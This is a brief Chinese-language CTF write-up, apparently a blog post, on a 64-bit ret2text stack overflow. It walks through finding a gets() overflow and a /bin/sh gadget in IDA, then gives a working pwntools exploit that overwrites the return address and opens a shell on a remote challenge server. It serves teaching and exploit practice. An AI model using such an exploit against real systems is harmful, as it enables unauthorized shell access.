01栈溢出之ret2text
很简单的一个栈溢出
直接IDA分析
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/58143cc766c7d70e4ea6f49efcb4578f.png)
从main函数跟进到welcome函数
get() 很明显的溢出
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/f5f360cdea0e891d023ca4190bdf336c.png)
payload = 'a'*(0x80+8)
因为是64位的,所以后面要加上8
Shift+F12
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/88f0254155cd67aba1c6147e7daa0335.png)
发现/bin/sh 果然够简单的。。。
双击进去
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/a04f3d5ddeb6fd1348c9d57b94ce0581.png)
再双击
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/5c7421a43ea08752995b5a44c5582207.png)
找到地址
exp:
from pwn import *
p=remote('111.231.70.44',28072)
payload='a'*(0x80+8) + p64(0x40063B)
p.sendline(payload)
p.interactive()